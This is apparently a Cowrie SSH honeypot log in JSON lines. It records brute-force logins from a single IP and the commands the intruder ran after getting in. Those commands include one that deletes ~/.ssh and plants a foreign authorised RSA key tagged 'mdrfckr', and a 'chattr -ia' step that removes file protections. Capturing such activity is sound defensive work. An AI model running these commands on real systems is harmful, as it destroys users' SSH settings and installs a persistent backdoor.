{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:12.918901Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:05:13.516601Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:05:13.517668Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:05:13.790286Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:13.793195Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54750,"dst_ip":"1.2.3.4","dst_port":22,"session":"4505560ab75d","protocol":"ssh","message":"New connection: 212.227.235.229:54750 (1.2.3.4:22) [session: 4505560ab75d]","sensor":"my-vps","timestamp":"2025-09-09T10:05:14.040696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:14.042874Z","src_ip":"212.227.235.229","session":"4505560ab75d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:14.309401Z","src_ip":"212.227.235.229","session":"4505560ab75d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35600,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ff28c4b8a56","protocol":"ssh","message":"New connection: 212.227.235.229:35600 (1.2.3.4:22) [session: 9ff28c4b8a56]","sensor":"my-vps","timestamp":"2025-09-09T10:05:14.920142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:14.921263Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:15.015623Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:05:15.358100Z","src_ip":"212.227.235.229","session":"4505560ab75d"}
{"eventid":"cowrie.login.success","username":"root","password":"poiu0987","message":"login attempt [root/poiu0987] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:05:15.437870Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:05:15.668136Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:05:15.671345Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:05:15.673658Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:15.773241Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:05:16.069324Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.069807Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.170622Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.171991Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35616,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca172cda898","protocol":"ssh","message":"New connection: 212.227.235.229:35616 (1.2.3.4:22) [session: cca172cda898]","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.264629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.265774Z","src_ip":"212.227.235.229","session":"cca172cda898"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.361019Z","src_ip":"212.227.235.229","session":"cca172cda898"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.631909Z","src_ip":"212.227.235.229","session":"4505560ab75d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.779889Z","src_ip":"212.227.235.229","session":"cca172cda898"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54752,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eac15462694","protocol":"ssh","message":"New connection: 212.227.235.229:54752 (1.2.3.4:22) [session: 7eac15462694]","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.904078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:16.905405Z","src_ip":"212.227.235.229","session":"7eac15462694"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:17.177068Z","src_ip":"212.227.235.229","session":"7eac15462694"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:17.877543Z","src_ip":"212.227.235.229","session":"cca172cda898"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35630,"dst_ip":"1.2.3.4","dst_port":22,"session":"254468b65e2a","protocol":"ssh","message":"New connection: 212.227.235.229:35630 (1.2.3.4:22) [session: 254468b65e2a]","sensor":"my-vps","timestamp":"2025-09-09T10:05:17.972251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:17.973797Z","src_ip":"212.227.235.229","session":"254468b65e2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.070506Z","src_ip":"212.227.235.229","session":"254468b65e2a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.288411Z","src_ip":"212.227.235.229","session":"7eac15462694"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.490766Z","src_ip":"212.227.235.229","session":"254468b65e2a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.558915Z","src_ip":"212.227.235.229","session":"7eac15462694"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.561361Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.587054Z","src_ip":"212.227.235.229","session":"9ff28c4b8a56"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:18.589963Z","src_ip":"212.227.235.229","session":"254468b65e2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36466,"dst_ip":"1.2.3.4","dst_port":22,"session":"b55d2e469bbe","protocol":"ssh","message":"New connection: 212.227.235.229:36466 (1.2.3.4:22) [session: b55d2e469bbe]","sensor":"my-vps","timestamp":"2025-09-09T10:05:46.836524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:46.841635Z","src_ip":"212.227.235.229","session":"b55d2e469bbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:47.098481Z","src_ip":"212.227.235.229","session":"b55d2e469bbe"}
{"eventid":"cowrie.login.failed","username":"webmin","password":"webmin","message":"login attempt [webmin/webmin] failed","sensor":"my-vps","timestamp":"2025-09-09T10:05:48.183730Z","src_ip":"212.227.235.229","session":"b55d2e469bbe"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:05:49.451741Z","src_ip":"212.227.235.229","session":"b55d2e469bbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59326,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d0ccdf3bcc","protocol":"ssh","message":"New connection: 212.227.235.229:59326 (1.2.3.4:22) [session: 66d0ccdf3bcc]","sensor":"my-vps","timestamp":"2025-09-09T10:06:03.510740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:06:03.519895Z","src_ip":"212.227.235.229","session":"66d0ccdf3bcc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:06:03.780635Z","src_ip":"212.227.235.229","session":"66d0ccdf3bcc"}
{"eventid":"cowrie.login.failed","username":"blank","password":"qwerty","message":"login attempt [blank/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T10:06:05.190468Z","src_ip":"212.227.235.229","session":"66d0ccdf3bcc"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:06:06.456213Z","src_ip":"212.227.235.229","session":"66d0ccdf3bcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35632,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6fe2c211adf","protocol":"ssh","message":"New connection: 212.227.235.229:35632 (1.2.3.4:22) [session: f6fe2c211adf]","sensor":"my-vps","timestamp":"2025-09-09T10:06:17.053258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:06:17.057593Z","src_ip":"212.227.235.229","session":"f6fe2c211adf"}
